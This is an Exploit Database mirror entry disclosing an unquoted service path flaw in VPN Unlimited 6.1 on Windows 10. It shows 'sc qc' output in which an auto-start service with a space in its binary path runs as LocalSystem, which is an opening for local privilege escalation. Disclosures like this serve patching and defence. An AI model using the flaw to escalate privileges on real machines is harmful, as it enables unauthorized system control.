exploit-db-mirror/exploits/windows/local/47916.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

21 lines
No EOL
716 B
Text

# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path
# Date: 2020-1-13
# Exploit Author: Amin Rawah
# Vendor Homepage: https://www.vpnunlimitedapp.com
# Version: 6.1
# Tested on: Windows 10 64bit
C:\Users\Amin>sc qc VPNUnlimitedService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VPNUnlimitedService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VPN
Unlimited\vpn-unlimited-daemon.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VPN Unlimited Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem